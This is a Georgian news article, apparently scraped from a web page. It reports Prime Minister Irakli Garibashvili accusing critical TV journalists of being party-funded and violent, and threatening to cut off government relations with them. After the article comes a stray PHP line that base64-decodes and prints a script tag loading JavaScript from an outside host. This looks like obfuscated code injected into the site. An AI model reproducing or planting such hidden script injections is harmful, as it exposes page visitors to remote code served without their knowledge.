celsiusi
ავერსი საქკაბელი
"თქვენ [ტელევიზიები] თუ არ შეწყვეტთ ამ დესტრუქციას, მე კი არა, ჩვენი სამთავრობო გუნდი დაასრულებს თქვენთან ურთიერთობას", - ამ სიტყვებით მიმართა პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა კრიტიკული მედიის წარმომადგენლებს.
 
საქმე ის არის, რომ ირაკლი ღარიბაშვილი დღეს რეგიონული განვითარების 10-წლიანი გეგმის პრეზენტაციის შემდეგ ჟურნალისტების კითხვებზე პასუხების გასაცემად მივიდა, რა დროსაც "ფორმულას" ჟურნალისტმა გიორგი კიკაბიძემ მთავრობის მეთაურს ჰკითხა, როდის აიღებს ის პასუხისმგებლობას 5 ივლისს ჩადენილ ძალადობაზე და როდის გადადგება თანამდებობიდან.
 
„თქვენი ტელევიზია [„ფორმულა“] არის პარტიული ტელევიზია. თქვენ ფინანსდებით ერთ-ერთ ყველაზე კორუმპირებული, კრიმინალის დავით კეზერაშვილის მიერ. თუ თქვენ ხართ პოლიტიკოსი, პარტიის წევრი, მაშინ ასე ილაპარაკეთ. ესენი არის კორუმპირებული პოლიტიკოსების მიერ დაფინანსებული არხები. თქვენ თუ არ შეწყვეტთ ამ დესტრუქციას, თქვენთან მე კი არა, ჩვენი სამთავრობო გუნდი დაასრულებთ ურთიერთობას“, - მიმართა ღარიბაშვილმა კრიტიკული ტელევიზიების ჟურნალისტებს.
 
მისივე თქმით, ჟურნალისტები მოძალადეები არიან და ამავე დროს „ნაციონალური მოძრაობის" წევრები.
 
„თქვენ ხართ მოძალადეები. თქვენ ხართ „ნაციონალური მოძრაობის“ წევრები. ეს სიყალბე და ძალადობა უნდა დაასრულოთ თქვენ, ჟურნალისტებმა. ვსაუბრობ თქვენს მმართველებზე, სამწუხაროა, რომ ტელევიზიები უკვე რეალურად იქცნენ პარტიული ორგანიზაციების დანაყოფებად.
 
მთელი სიყალბე, რაც ბოლო დღეებში ვიხილეთ, არის ვიწროპარტიული ინტერესების გატარებისთვის“, - განაცხადა ირაკლი ღარიბაშვილმა.
 
აქვე "მთავარი არხის" ჟურნალისტმა პრემიერს ჰკითხა, თუ როდის დაუბრუნდება არხს მიკროფონი, რომელიც ჟურნალისტს კულტურის მინისტრმა თეა წულუკიანმა წაართვა. ირაკლი ღარიბაშვილმა ჯერ გაიკვირვა, თუ რა მოხდა და რა შუაში იყო მიკროფონი, ხოლო მოგვიანებით თქვა, რომ ეს ძალადობა არ იყო.
1229
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");